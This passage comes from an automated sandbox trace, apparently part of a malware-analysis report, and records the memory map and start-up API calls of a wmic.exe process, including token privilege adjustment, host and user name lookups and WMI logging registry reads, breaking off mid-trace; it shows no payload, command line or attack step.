"c:\\windows\\system32\\wow64.dll") Region: id = 3526 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3527 start_va = 0xc30000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 3528 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3529 start_va = 0x9f0000 end_va = 0x9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 3530 start_va = 0xa00000 end_va = 0xa03fff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 3531 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 3532 start_va = 0xb60000 end_va = 0xc1dfff entry_point = 0xb60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3533 start_va = 0xd30000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 3534 start_va = 0xd90000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 3535 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3536 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3537 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3538 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3539 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3540 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3541 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3542 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3543 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3544 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3545 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3546 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3547 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3548 start_va = 0x7f6c0000 end_va = 0x7f7bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6c0000" filename = "" Region: id = 3549 start_va = 0x7f7e9000 end_va = 0x7f7ebfff entry_point = 0x0 region_type = private name = "private_0x000000007f7e9000" filename = "" Region: id = 3550 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3551 start_va = 0xa10000 end_va = 0xa10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 3552 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3553 start_va = 0xb30000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 3554 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3555 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3556 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3557 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3558 start_va = 0xda0000 end_va = 0x10d6fff entry_point = 0xda0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3559 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3560 start_va = 0x10e0000 end_va = 0x11c8fff entry_point = 0x10e0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3561 start_va = 0xb40000 end_va = 0xb43fff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 3562 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 3563 start_va = 0x10e0000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 3564 start_va = 0x1160000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3565 start_va = 0x10e0000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 3566 start_va = 0x1150000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3567 start_va = 0x1160000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3568 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3569 start_va = 0x5370000 end_va = 0x54affff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 3570 start_va = 0x1200000 end_va = 0x12defff entry_point = 0x1200000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3571 start_va = 0x54b0000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x00000000054b0000" filename = "" Region: id = 3572 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0xc20000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 3573 start_va = 0xd70000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3574 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3575 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3576 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3577 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3578 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3579 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3580 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3581 start_va = 0x10e0000 end_va = 0x1109fff entry_point = 0x10e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3582 start_va = 0x1120000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3583 start_va = 0x58b0000 end_va = 0x5a37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058b0000" filename = "" Region: id = 3584 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3585 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3586 start_va = 0x10e0000 end_va = 0x10effff entry_point = 0x10e0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 3587 start_va = 0x5a40000 end_va = 0x5bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a40000" filename = "" Region: id = 3588 start_va = 0x5bd0000 end_va = 0x6fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005bd0000" filename = "" Region: id = 3589 start_va = 0x10f0000 end_va = 0x10f0fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 3590 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3591 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3592 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3593 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3594 start_va = 0x5370000 end_va = 0x548ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 3595 start_va = 0x54a0000 end_va = 0x54affff entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 3596 start_va = 0x1110000 end_va = 0x1110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 3597 start_va = 0x5370000 end_va = 0x5427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 3598 start_va = 0x5480000 end_va = 0x548ffff entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 3599 start_va = 0x1110000 end_va = 0x1113fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 3600 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3601 start_va = 0x6fd0000 end_va = 0x70cffff entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 3602 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3603 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3604 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3605 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 3606 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 3607 start_va = 0x5430000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 3608 start_va = 0x70d0000 end_va = 0x710ffff entry_point = 0x0 region_type = private name = "private_0x00000000070d0000" filename = "" Region: id = 3609 start_va = 0x7110000 end_va = 0x714ffff entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 3610 start_va = 0x7150000 end_va = 0x718ffff entry_point = 0x0 region_type = private name = "private_0x0000000007150000" filename = "" Region: id = 3611 start_va = 0x7f6ba000 end_va = 0x7f6bcfff entry_point = 0x0 region_type = private name = "private_0x000000007f6ba000" filename = "" Region: id = 3612 start_va = 0x7f6bd000 end_va = 0x7f6bffff entry_point = 0x0 region_type = private name = "private_0x000000007f6bd000" filename = "" Region: id = 3613 start_va = 0x7f7e6000 end_va = 0x7f7e8fff entry_point = 0x0 region_type = private name = "private_0x000000007f7e6000" filename = "" Region: id = 3614 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3615 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3616 start_va = 0x1130000 end_va = 0x1144fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 3617 start_va = 0x7190000 end_va = 0x71b8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007190000" filename = "" Thread: id = 250 os_tid = 0xf0c [0114.628] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0114.628] __set_app_type (_Type=0x1) [0114.628] __p__fmode () returned 0x77ac4d6c [0114.628] __p__commode () returned 0x77ac5b1c [0114.628] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0114.628] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0114.629] ??0CHString@@QAE@XZ () returned 0x13495ec [0114.629] ??0CHString@@QAE@XZ () returned 0x13498fc [0114.629] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0114.629] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0114.629] _onexit (_Func=0x1340a20) returned 0x1340a20 [0114.629] _onexit (_Func=0x1340a30) returned 0x1340a30 [0114.629] _onexit (_Func=0x1340a50) returned 0x1340a50 [0114.629] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.629] ResolveDelayLoadedAPI () returned 0x770fcd50 [0114.629] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0114.631] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0114.637] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xc30500) returned 0x0 [0114.646] GetCurrentProcess () returned 0xffffffff [0114.646] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xabf8f8 | out: TokenHandle=0xabf8f8*=0x158) returned 1 [0114.646] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xabf8f4 | out: TokenInformation=0x0, ReturnLength=0xabf8f4) returned 0 [0114.646] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xd93a38, TokenInformationLength=0x118, ReturnLength=0xabf8f4 | out: TokenInformation=0xd93a38, ReturnLength=0xabf8f4) returned 1 [0114.646] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xd93a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0114.647] CloseHandle (hObject=0x158) returned 1 [0114.647] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.649] _vsnwprintf (in: _Buffer=0xd93ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xabf880 | out: _Buffer="ms_409") returned 6 [0114.649] GetComputerNameW (in: lpBuffer=0xd93b10, nSize=0xabf8e4 | out: lpBuffer="LHNIWSJ", nSize=0xabf8e4) returned 1 [0114.649] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.649] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.649] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0114.649] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xabf8f8 | out: lpNameBuffer=0x0, nSize=0xabf8f8) returned 0x0 [0114.650] GetLastError () returned 0xea [0114.650] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xd93b38, nSize=0xabf8f8 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xabf8f8) returned 0x1 [0114.651] lstrlenW (lpString="") returned 0 [0114.651] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.651] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0114.652] lstrlenW (lpString=".") returned 1 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0114.652] lstrlenW (lpString="LOCALHOST") returned 9 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] lstrlenW (lpString="LHNIWSJ") returned 7 [0114.652] ResolveDelayLoadedAPI () returned 0x77bb9840 [0114.655] SysStringLen (param_1="IDENTIFY") returned 0x8 [0114.655] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0114.655] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0114.655] SysStringLen (param_1="IDENTIFY") returned 0x8 [0114.655] SysStringLen (param_1="IMPERSONATE") returned 0xb [0114.655] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0114.655] SysStringLen (param_1="IMPERSONATE") returned 0xb [0114.655] SysStringLen (param_1="IDENTIFY") returned 0x8 [0114.655] SysStringLen (param_1="IDENTIFY") returned 0x8 [0114.655] SysStringLen (param_1="IMPERSONATE") returned 0xb [0114.655] SysStringLen (param_1="DELEGATE") returned 0x8 [0114.655] SysStringLen (param_1="IDENTIFY") returned 0x8 [0114.655] SysStringLen (param_1="DELEGATE") returned 0x8 [0114.655] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0114.655] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0114.655] SysStringLen (param_1="DELEGATE") returned 0x8 [0114.655] SysStringLen (param_1="NONE") returned 0x4 [0114.655] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.655] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.655] SysStringLen (param_1="NONE") returned 0x4 [0114.655] SysStringLen (param_1="CONNECT") returned 0x7 [0114.655] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.656] SysStringLen (param_1="CALL") returned 0x4 [0114.656] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.656] SysStringLen (param_1="CALL") returned 0x4 [0114.656] SysStringLen (param_1="CONNECT") returned 0x7 [0114.656] SysStringLen (param_1="PKT") returned 0x3 [0114.656] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.656] SysStringLen (param_1="PKT") returned 0x3 [0114.656] SysStringLen (param_1="NONE") returned 0x4 [0114.656] SysStringLen (param_1="NONE") returned 0x4 [0114.656] SysStringLen (param_1="PKT") returned 0x3 [0114.656] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0114.656] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.656] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0114.656] SysStringLen (param_1="NONE") returned 0x4 [0114.656] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0114.656] SysStringLen (param_1="PKT") returned 0x3 [0114.656] SysStringLen (param_1="PKT") returned 0x3 [0114.656] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0114.656] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0114.656] SysStringLen (param_1="DEFAULT") returned 0x7 [0114.656] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0114.656] SysStringLen (param_1="PKT") returned 0x3 [0114.656] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0114.656] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0114.656] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0114.656] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0114.656] GetSystemDirectoryW (in: lpBuffer=0xd929d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.656] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0114.656] SysStringLen (param_1="\\wbem\\") returned 0x6 [0114.657] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0114.657] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0114.657] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0114.657] GetCurrentThreadId () returned 0xf0c [0114.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xabf408 | out: phkResult=0xabf408*=0x164) returned 0x0 [0114.657] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xabf414, lpcbData=0xabf410*=0x400 | out: lpType=0x0, lpData=0xabf414*=0x30, lpcbData=0xabf410*=0x4) returned 0x0 [0114.657] _wcsicmp (_String1="0", _String2="1") returned -1 [0114.657] _wcsicmp (_String1="0", _String2="2") returned -2 [0114.657] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xabf410*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xabf410*=0x42) returned 0x0 [0114.657] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xd92be0, lpcbData=0xabf410*=0x42 | out: lpType=0x0, lpData=0xd92be0*=0x25, lpcbData=0xabf410*=0x42) returned 0x0 [0114.657] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0114.657] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0114.657] 